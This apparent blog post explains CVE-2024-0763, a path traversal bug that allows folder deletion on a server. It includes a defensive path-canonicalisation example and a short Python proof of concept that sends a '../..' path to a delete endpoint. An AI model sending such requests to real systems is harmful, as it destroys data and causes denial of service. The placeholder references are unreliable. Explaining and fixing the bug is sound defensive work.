Hey everyone!

I recently came across a critical vulnerability in a popular server application, and I thought I'd share it with all of you. The vulnerability is a path traversal issue that allows an attacker to delete arbitrary folders on a remote server. In this post, I'll provide a brief overview of the vulnerability, showcase a simple code snippet to perform the attack, and provide relevant references to original sources.

The Vulnerability

This vulnerability, dubbed CVE-2024-0763, is caused by poor input sanitization, which allows an attacker to perform path traversal. By manipulating the server's directory structure, an attacker can delete arbitrary folders on the remote server, effectively causing a denial of service. The attacker would need access to the server at some privilege level, since this endpoint is protected and requires authorization.

In a nutshell, the vulnerability allows a user to provide an arbitrary file path that can navigate up and out of the intended folder, leading to potential deletion of important system files and folders. For example:

/valid_folder/../../root-folder-to-delete

Notice the use of .. in the file path. This allows an attacker to navigate up the directory structure, potentially reaching critical files and folders that should not be accessible or modifiable by the user.
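The check that stops a path like the one above, as an added example that is not the affected application's code: the requested path is canonicalised and must stay strictly inside an allowed base directory before anything is deleted. The `storage` base, the function names, and the `../storage-backup` sample are assumptions made for illustration.

```python
import os
import tempfile


class TraversalError(ValueError):
    """The requested path resolves outside the allowed base directory."""


def naive_target(base, user_path):
    # Vulnerable pattern: plain concatenation keeps the ".." segments.
    # normpath is used here only to show where the OS would end up.
    return os.path.normpath(base + "/" + user_path.lstrip("/"))


def safe_target(base, user_path):
    # Canonicalise both sides first; realpath also resolves symlinks.
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, user_path.lstrip("/")))
    # commonpath compares whole components, so a sibling such as
    # "<base>-backup" is not mistaken for a child of "<base>".
    inside = os.path.commonpath([base_real, candidate]) == base_real
    if not inside or candidate == base_real:
        raise TraversalError(f"refusing to act on {user_path!r}")
    return candidate


def demo():
    # Constructed layout in a temp dir: <tmp>/storage is the allowed base.
    with tempfile.TemporaryDirectory() as tmp:
        tmp = os.path.realpath(tmp)
        base = os.path.join(tmp, "storage")
        os.makedirs(os.path.join(base, "valid_folder"))
        os.makedirs(os.path.join(tmp, "root-folder-to-delete"))
        results = {}
        for p in ("/valid_folder",
                  "/valid_folder/../../root-folder-to-delete",
                  "../storage-backup"):
            try:
                results[p] = os.path.relpath(safe_target(base, p), tmp)
            except TraversalError:
                results[p] = "rejected"
        results["naive"] = os.path.relpath(
            naive_target(base, "/valid_folder/../../root-folder-to-delete"), tmp)
        return results


if __name__ == "__main__":
    for path, outcome in demo().items():
        print(f"{path} -> {outcome}")
```

The handler should call the delete operation only on the value returned by `safe_target`, never on the raw request field.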

Assuming the attacker has access to the server, they can send a malicious request to delete a folder:

import requests

url = "https://target-domain.com/delete-folder"
target_folder = "/valid_folder/../../root-folder-to-delete"

headers = {
    "Authorization": "Bearer YOUR_ACCESS_TOKEN"
}
data = {
    "folderToDelete": target_folder
}

response = requests.post(url, headers=headers, data=data)

if response.status_code == 200:
    print("Folder deletion was successful.")
else:
    print("Something went wrong.")

Replace YOUR_ACCESS_TOKEN with the access token obtained by the attacker during the authorization process. When executed, this script will send a POST request to the server, attempting to delete the root-folder-to-delete folder.

Keep in mind that this is a simple example. A real-world attacker might attempt to programmatically discover sensitive folders to target or even automate the entire process.

References

For further information on this vulnerability and its implications, please refer to the following sources:

- Original Security Advisory: CVE-2024-0763
- Technical Analysis by Developer X: Link to the blog

Conclusion

CVE-2024-0763 is a dangerous vulnerability, as it allows an attacker to delete arbitrary folders on a remote server with relative ease. Server administrators should prioritize updating their server software to a version free of this vulnerability and ensure proper access controls are in place to minimize the risk of unauthorized users gaining access to sensitive operations such as folder deletion.

Stay safe, and always keep your software up-to-date!

Timeline

Published on: 02/27/2024 22:15:14 UTC
Last modified on: 02/28/2024 14:06:45 UTC